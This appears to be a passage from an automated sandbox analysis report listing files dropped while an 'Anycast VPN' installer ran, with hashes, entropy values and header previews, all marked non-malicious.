                                                                                                                            SSDEEP:12:TMHdGGnOYOAOXQEN+uKpvvvXf/EN+bpcWQvvvXVm/EN+QvvXlfOAONI3xT:2dLO/QEKpnvn1pcWQnvFm/AvJO6
                                                                                                                            MD5:0CFFFBD7BBA9C204EEBD4FAEE63656E7
                                                                                                                            SHA1:7CA2A76169E63E9DC070E6993EE4EEF38E268E55
                                                                                                                            SHA-256:4ECB945600B6D42DFCACAB27001857EBF101058E7A459D6D3BC15EFAD32504B9
                                                                                                                            SHA-512:B7972A5BEF1A4B2CA84CA2780809576EE028C33C281609FE6A5DFA41E1D04D1D7013AA125F964BFCBD3BB219288C7FA7C6FE7FAC458AD1BD168EAFBF3BF65142
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <userSettings>.. <Anycast.Properties.Settings>.. <setting name="UpgradeRequired" serializeAs="String">.. <value>False</value>.. </setting>.. <setting name="UniqueIdentifier" serializeAs="String">.. <value>9d706d26-dfcd-4b59-8c51-6ba2076dbdc5</value>.. </setting>.. <setting name="CultureCode" serializeAs="String">.. <value>en-US</value>.. </setting>.. </Anycast.Properties.Settings>.. </userSettings>..</configuration>

                                                                                                                            C:\Users\user\AppData\Local\Anycast\Anycast.exe_Url_kqhrjl0namicahrzazwrmvt22k2r0j2i\1.0.24.0\yqiawlmq.newcfg

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):483
                                                                                                                            Entropy (8bit):4.626755807366635
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:TMHdGGnOYOAOXQEN+uKpvvvXf/EN+bpcWQvvvXlfOAONI3xT:2dLO/QEKpnvn1pcWQnvJO6
                                                                                                                            MD5:95D62ADD43B956B61034EC971FF54A9A
                                                                                                                            SHA1:67F3D3D21357E29507CD2EF64516F2263D740E42
                                                                                                                            SHA-256:70E80B2EA062BADCA51D3B39692D10429E43ABE0B5335FBD29EDB71274CA7010
                                                                                                                            SHA-512:513A403B09140AD498BCC0638DB31FE5639005F2358CAE6C659B6F40ED50A3874B8798D771D9867198BCB56FE1D552CB81EA8A139FBBA14325D6DEA29BAC8B91
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <userSettings>.. <Anycast.Properties.Settings>.. <setting name="UpgradeRequired" serializeAs="String">.. <value>False</value>.. </setting>.. <setting name="UniqueIdentifier" serializeAs="String">.. <value>9d706d26-dfcd-4b59-8c51-6ba2076dbdc5</value>.. </setting>.. </Anycast.Properties.Settings>.. </userSettings>..</configuration>

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\A[1].exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):11223944
                                                                                                                            Entropy (8bit):7.994568058251744
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:196608:CvyhL33XXLybGKdNGYj+MxmpVAI62jSBuUtW1lJwo2LrKUYV9bWI:CKhL3HyGGlj+E3I6Ev0Pex
                                                                                                                            MD5:25D325AFB078B572B0FBCA2B84AA264C
                                                                                                                            SHA1:6EF782ACF674F3E66B5973E143C2FDDA7E076914
                                                                                                                            SHA-256:A3C3F7A0014E41FF435DB5B87EC92E60ADA72A94FC401CB1EF3CF6DAF71630E1
                                                                                                                            SHA-512:F4FF58F70A06C425AD832AA19B3DD51B2B4FC534DBA8D2CD68A49D5C22E3CE366F5D8B33CD687C7E5A64FB3AB02E60330D66A0C3BFAB09750B2AFAA508705B68
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...@.$_.................h...........4............@.......................................@.........................................................8...P&...........................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata...0...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\DotNetChecker.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):86528
                                                                                                                            Entropy (8bit):6.31749182780373
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:AZBjgSXlkq8su+OudgGpGlmQSMqJS4HGsorJKQUDs0OsWPIcdGbk2HeJ:AYvo7PMqEuiKQGbk2HeJ
                                                                                                                            MD5:F18364FA5084ADD86C6E73E457404F18
                                                                                                                            SHA1:6D87C4B9DBF78AF88FDDF0D4D5FEBE845C8E4E6A
                                                                                                                            SHA-256:39C43D67F546FC898F7406D213B73DCB1BC30FC811DDFA3A02B6B50C29D11F91
                                                                                                                            SHA-512:716892492390FE4314F3289286F733D07B8B84DE1F5AF0676B26E68C0BE01808682D35AD2BB9E9491247B7BB5A0EA297A6850E26DE9BAF88621C789206107DB3
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o..............B.......B......B........P.......P.......P.......B.....+.#............aP......aP......dP......aP......Rich............................PE..L...{..Z...........!................n3....................................................@..........................9..L...,>..P...................................@2..p............................2..@...............4............................text...g........................... ..`.rdata...e.......f..................@..@.data........P.......4..............@....gfids.......p.......<..............@..@.rsrc................>..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\InstallOptions.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):15872
                                                                                                                            Entropy (8bit):5.471605464941094
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:EFC43tPegZ3eBaRwCPOYY7nNYXCg/Yosa:EMTgZ3eBTCmrnNAo
                                                                                                                            MD5:0A9FB96A7579B685EC36B17FC354E6A3
                                                                                                                            SHA1:355754104DD47D5FCF8918DEE0DC2E2EE53390A6
                                                                                                                            SHA-256:B34FB342F21D690AAC024B6F48A597E78D15791EF480AC55159CD585D0F64AF7
                                                                                                                            SHA-512:67870206FA7F1E7DF45C8C1BC2F51FB430F0A048A2BDB55A4A41525388CA3B50203784537F139169705A03DB4BB13B591162A79A5D2DF81A4D11FD849615C86B
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.px.q.+.q.+.q.+.q.+[q.+.~C+.q.+^R.+.q.+^R/+.q.+.w.+.q.+.Q.+.q.+Rich.q.+........PE..L.....$_...........!.........`.......+.......0............................................@..........................8......X1..................................X....................................................0..X............................text............................... ..`.rdata..G....0......."..............@..@.data...DL...@.......,..............@....rsrc................6..............@..@.reloc..x............8..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\System.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12288
                                                                                                                            Entropy (8bit):5.737874809466366
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:nenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBDIwL:n8+Qlt70Fj/lQRY/9VjjfL
                                                                                                                            MD5:564BB0373067E1785CBA7E4C24AAB4BF
                                                                                                                            SHA1:7C9416A01D821B10B2EEF97B80899D24014D6FC1
                                                                                                                            SHA-256:7A9DDEE34562CD3703F1502B5C70E99CD5BBA15DE2B6845A3555033D7F6CB2A5
                                                                                                                            SHA-512:22C61A323CB9293D7EC5C7E7E60674D0E2F7B29D55BE25EB3C128EA2CD7440A1400CEE17C43896B996278007C0D247F331A9B8964E3A40A0EB1404A9596C4472
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....$_...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\UserInfo.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4096
                                                                                                                            Entropy (8bit):3.346742380227412
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:qKMQE7F4aBr1wH8l9QIXTZShMmj3jkRTbGr7X:5bkFZruHSXTH6jkRnGr7X
                                                                                                                            MD5:98FF85B635D9114A9F6A0CD7B9B649D0
                                                                                                                            SHA1:7A51B13AA86A445A2161FA1A567CDAECAA5C97C4
                                                                                                                            SHA-256:933F93A30CE44DF96CBC4AC0B56A8B02EE01DA27E4EA665D1D846357A8FCA8DE
                                                                                                                            SHA-512:562342532C437236D56054278D27195E5F8C7E59911FC006964149FC0420B1F9963D72A71EBF1CD3DFEE42D991A4049A382F7E669863504C16F0FE7097A07A0A
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L.....$_...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\ioSpecial.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1334
                                                                                                                            Entropy (8bit):3.7173156272148593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Q+sxvtSSAD5ylSjqWCs7y6Pa3R9n9W6k8lfDOCxGPxCk6k24YpspYaH65OVKC+nT:rsx9AQSjqQtaJC8lpmHhYaN1C
                                                                                                                            MD5:0A7911AC234733A426671EE44C47EA31
                                                                                                                            SHA1:DC0A30C2562F4C2B0996A205E18CB9E9672CEC80
                                                                                                                            SHA-256:979271A20B0A552374947571169484CE7E36603FA0FD88CE4F30EC32C93AA831
                                                                                                                            SHA-512:C382BD4C93DC2556F41D70383B0D55EBE8ABA411D1F321E04B59EAB9FFAE080FD0B31CB20ABE70F20E7E13D7E1550E5700AFFB90CAB396349348DAEF494B4A1A
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.S.e.t.t.i.n.g.s.].....R.e.c.t.=.1.0.4.4.....N.u.m.F.i.e.l.d.s.=.4.....R.T.L.=.0.....N.e.x.t.B.u.t.t.o.n.T.e.x.t.=.&.F.i.n.i.s.h.....C.a.n.c.e.l.E.n.a.b.l.e.d.=.....S.t.a.t.e.=.0.....[.F.i.e.l.d. .1.].....T.y.p.e.=.b.i.t.m.a.p.....L.e.f.t.=.0.....R.i.g.h.t.=.1.0.9.....T.o.p.=.0.....B.o.t.t.o.m.=.1.9.3.....F.l.a.g.s.=.R.E.S.I.Z.E.T.O.F.I.T.....T.e.x.t.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.i.1.6.F.5...t.m.p.\.m.o.d.e.r.n.-.w.i.z.a.r.d...b.m.p.....H.W.N.D.=.1.9.7.7.8.2.....[.F.i.e.l.d. .2.].....T.y.p.e.=.l.a.b.e.l.....L.e.f.t.=.1.2.0.....R.i.g.h.t.=.3.1.5.....T.o.p.=.1.0.....T.e.x.t.=.C.o.m.p.l.e.t.i.n.g. .A.n.y.c.a.s.t. .V.P.N. .1...0...2.4. .S.e.t.u.p.....B.o.t.t.o.m.=.3.8.....H.W.N.D.=.1.9.7.7.8.8.....[.F.i.e.l.d. .3.].....T.y.p.e.=.l.a.b.e.l.....L.e.f.t.=.1.2.0.....R.i.g.h.t.=.3.1.5.....T.o.p.=.4.5.....B.o.t.t.o.m.=.8.5.....T.e.x.t.=.A.n.y.c.a.s.t. .V.P.N. .1...0...2.4. .h.a.s. .b.e.e.n. .i.n.s.t.a.l.l.e.d. .o.n. .y.o.u.r. .c.o.m.p.u.t.e.r...\.

                                                                                                                            C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\modern-wizard.bmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4, image size 26376, resolution 2834 x 2834 px/m, cbSize 26494, bits offset 118
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26494
                                                                                                                            Entropy (8bit):1.9568109962493656
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
                                                                                                                            MD5:CBE40FD2B1EC96DAEDC65DA172D90022
                                                                                                                            SHA1:366C216220AA4329DFF6C485FD0E9B0F4F0A7944
                                                                                                                            SHA-256:3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
                                                                                                                            SHA-512:62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
                                                                                                                            Malicious:false
                                                                                                                            Preview:BM~g......v...(.......:............g..................................................................................DDD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@..DDD....DDDDDD........................................DDDDDDDDDD....DDDDDDDDD........DD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDD@@@@DDDDDDDDDD@@@@@@D..DD....DDDDDDD......................................DDDDDDDDDD....DDDDDDDDDD......D..D@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@DDD..D.....DDDDDD......................................DDDDDDDDD.....DDDDDDDDD......DDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@@DDDD.......DDDDDD.....................................DDDDDDDDDD....DDDDDDDDDD.....DDDDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@DDDDDD.......DDDDDD....................................DDDDDDDDD....DDDDDDDDDD......DDDDDD..@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                                                                                                                            C:\Users\user\AppData\Local\Temp\nst31D0.tmp\DotNetChecker.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):86528
                                                                                                                            Entropy (8bit):6.31749182780373
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:AZBjgSXlkq8su+OudgGpGlmQSMqJS4HGsorJKQUDs0OsWPIcdGbk2HeJ:AYvo7PMqEuiKQGbk2HeJ
                                                                                                                            MD5:F18364FA5084ADD86C6E73E457404F18
                                                                                                                            SHA1:6D87C4B9DBF78AF88FDDF0D4D5FEBE845C8E4E6A
                                                                                                                            SHA-256:39C43D67F546FC898F7406D213B73DCB1BC30FC811DDFA3A02B6B50C29D11F91
                                                                                                                            SHA-512:716892492390FE4314F3289286F733D07B8B84DE1F5AF0676B26E68C0BE01808682D35AD2BB9E9491247B7BB5A0EA297A6850E26DE9BAF88621C789206107DB3
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o..............B.......B......B........P.......P.......P.......B.....+.#............aP......aP......dP......aP......Rich............................PE..L...{..Z...........!................n3....................................................@..........................9..L...,>..P...................................@2..p............................2..@...............4............................text...g........................... ..`.rdata...e.......f..................@..@.data........P.......4..............@....gfids.......p.......<..............@..@.rsrc................>..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nst31D0.tmp\InstallOptions.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):15872
                                                                                                                            Entropy (8bit):5.471605464941094
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:EFC43tPegZ3eBaRwCPOYY7nNYXCg/Yosa:EMTgZ3eBTCmrnNAo
                                                                                                                            MD5:0A9FB96A7579B685EC36B17FC354E6A3
                                                                                                                            SHA1:355754104DD47D5FCF8918DEE0DC2E2EE53390A6
                                                                                                                            SHA-256:B34FB342F21D690AAC024B6F48A597E78D15791EF480AC55159CD585D0F64AF7
                                                                                                                            SHA-512:67870206FA7F1E7DF45C8C1BC2F51FB430F0A048A2BDB55A4A41525388CA3B50203784537F139169705A03DB4BB13B591162A79A5D2DF81A4D11FD849615C86B
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.px.q.+.q.+.q.+.q.+[q.+.~C+.q.+^R.+.q.+^R/+.q.+.w.+.q.+.Q.+.q.+Rich.q.+........PE..L.....$_...........!.........`.......+.......0............................................@..........................8......X1..................................X....................................................0..X............................text............................... ..`.rdata..G....0......."..............@..@.data...DL...@.......,..............@....rsrc................6..............@..@.reloc..x............8..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nst31D0.tmp\System.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12288
                                                                                                                            Entropy (8bit):5.737874809466366
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:nenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBDIwL:n8+Qlt70Fj/lQRY/9VjjfL
                                                                                                                            MD5:564BB0373067E1785CBA7E4C24AAB4BF
                                                                                                                            SHA1:7C9416A01D821B10B2EEF97B80899D24014D6FC1
                                                                                                                            SHA-256:7A9DDEE34562CD3703F1502B5C70E99CD5BBA15DE2B6845A3555033D7F6CB2A5
                                                                                                                            SHA-512:22C61A323CB9293D7EC5C7E7E60674D0E2F7B29D55BE25EB3C128EA2CD7440A1400CEE17C43896B996278007C0D247F331A9B8964E3A40A0EB1404A9596C4472
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....$_...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nst31D0.tmp\UserInfo.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4096
                                                                                                                            Entropy (8bit):3.346742380227412
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:qKMQE7F4aBr1wH8l9QIXTZShMmj3jkRTbGr7X:5bkFZruHSXTH6jkRnGr7X
                                                                                                                            MD5:98FF85B635D9114A9F6A0CD7B9B649D0
                                                                                                                            SHA1:7A51B13AA86A445A2161FA1A567CDAECAA5C97C4
                                                                                                                            SHA-256:933F93A30CE44DF96CBC4AC0B56A8B02EE01DA27E4EA665D1D846357A8FCA8DE
                                                                                                                            SHA-512:562342532C437236D56054278D27195E5F8C7E59911FC006964149FC0420B1F9963D72A71EBF1CD3DFEE42D991A4049A382F7E669863504C16F0FE7097A07A0A
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L.....$_...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\nst31D0.tmp\ioSpecial.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):1338
                                                                                                                            Entropy (8bit):3.7148324181863632
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Q+sxvtSSAD5ylSjqWCs7y6PaM9nRO6k8lfDOCxGixCk6k24YpKvXaH65OVKC+nq:rsx9AQSjqQtaoq8lpjH7XaNR
                                                                                                                            MD5:0283C887808B5F476282BA8F1DD307B6
                                                                                                                            SHA1:8295EDB3F035353F5D69352723FDAF9A47EBE697
                                                                                                                            SHA-256:E42D223D4AD8717E09C10BC79D094057A85D1C176FCB3317EB2ADEE3991E16B1
                                                                                                                            SHA-512:BFA0B5E32D7604069D4A8EF7B6342FD527AC835B13FE14AA093C8B4E6E74C04FE9BCD322F2DFBA0A40E0544393F5A0E7CFC7808A93ADE855D66E87D8F412885C
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.S.e.t.t.i.n.g.s.].....R.e.c.t.=.1.0.4.4.....N.u.m.F.i.e.l.d.s.=.4.....R.T.L.=.0.....N.e.x.t.B.u.t.t.o.n.T.e.x.t.=.&.F.i.n.i.s.h.....C.a.n.c.e.l.E.n.a.b.l.e.d.=.....S.t.a.t.e.=.0.....[.F.i.e.l.d. .1.].....T.y.p.e.=.b.i.t.m.a.p.....L.e.f.t.=.0.....R.i.g.h.t.=.1.0.9.....T.o.p.=.0.....B.o.t.t.o.m.=.1.9.3.....F.l.a.g.s.=.R.E.S.I.Z.E.T.O.F.I.T.....T.e.x.t.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.t.3.1.D.0...t.m.p.\.m.o.d.e.r.n.-.w.i.z.a.r.d...b.m.p.....H.W.N.D.=.4.5.9.8.6.8.....[.F.i.e.l.d. .2.].....T.y.p.e.=.l.a.b.e.l.....L.e.f.t.=.1.2.0.....R.i.g.h.t.=.3.1.5.....T.o.p.=.1.0.....T.e.x.t.=.C.o.m.p.l.e.t.i.n.g. .A.n.y.c.a.s.t. .V.P.N. .1...0...2.4. .S.e.t.u.p.....B.o.t.t.o.m.=.3.8.....H.W.N.D.=.1.9.7.8.4.8.....[.F.i.e.l.d. .3.].....T.y.p.e.=.l.a.b.e.l.....L.e.f.t.=.1.2.0.....R.i.g.h.t.=.3.1.5.....T.o.p.=.4.5.....B.o.t.t.o.m.=.8.5.....T.e.x.t.=.A.n.y.c.a.s.t. .V.P.N. .1...0...2.4. .h.a.s. .b.e.e.n. .i.n.s.t.a.l.l.e.d. .o.n. .y.o.u.r. .c.o.m.p.u.t.e.r...\.

                                                                                                                            C:\Users\user\AppData\Local\Temp\nst31D0.tmp\modern-wizard.bmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4, image size 26376, resolution 2834 x 2834 px/m, cbSize 26494, bits offset 118
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26494
                                                                                                                            Entropy (8bit):1.9568109962493656
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
                                                                                                                            MD5:CBE40FD2B1EC96DAEDC65DA172D90022
                                                                                                                            SHA1:366C216220AA4329DFF6C485FD0E9B0F4F0A7944
                                                                                                                            SHA-256:3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
                                                                                                                            SHA-512:62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
                                                                                                                            Malicious:false
                                                                                                                            Preview:BM~g......v...(.......:............g..................................................................................DDD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@..DDD....DDDDDD........................................DDDDDDDDDD....DDDDDDDDD........DD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDD@@@@DDDDDDDDDD@@@@@@D..DD....DDDDDDD......................................DDDDDDDDDD....DDDDDDDDDD......D..D@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@DDD..D.....DDDDDD......................................DDDDDDDDD.....DDDDDDDDD......DDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@@DDDD.......DDDDDD.....................................DDDDDDDDDD....DDDDDDDDDD.....DDDDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@DDDDDD.......DDDDDD....................................DDDDDDDDD....DDDDDDDDDD......DDDDDD..@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anycast\Anycast.lnk

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Fri Dec 15 02:19:40 2023, mtime=Tue Mar 12 14:32:25 2024, atime=Fri Dec 15 02:19:40 2023, length=1483856, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1118
                                                                                                                            Entropy (8bit):4.606290077263907
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8mN5GEYbdOE4TCYL4nAsB+dY4dQHyUUevqygm:8mb5YbdORLXsB+dXd4z2yg
                                                                                                                            MD5:82678321DDD7EA6C7FF6516C527998F8
                                                                                                                            SHA1:8FB111EE25AD0D3A2A1CFA5FECB8948DDCD1AF59
                                                                                                                            SHA-256:F145B2CD2EB05D6CF3E974BB30C6AB6764730AB159DD894CD7EF19D0FEEDC507
                                                                                                                            SHA-512:8CE2A1835AF98D8C08F452621AB6A065CA9A7F307E6C6D3C8E866BC83612FA7396D7E456487484C49DE20E79C385626977F3C7FBAC9CD9F439D500FC9A4611BA
                                                                                                                            Malicious:false
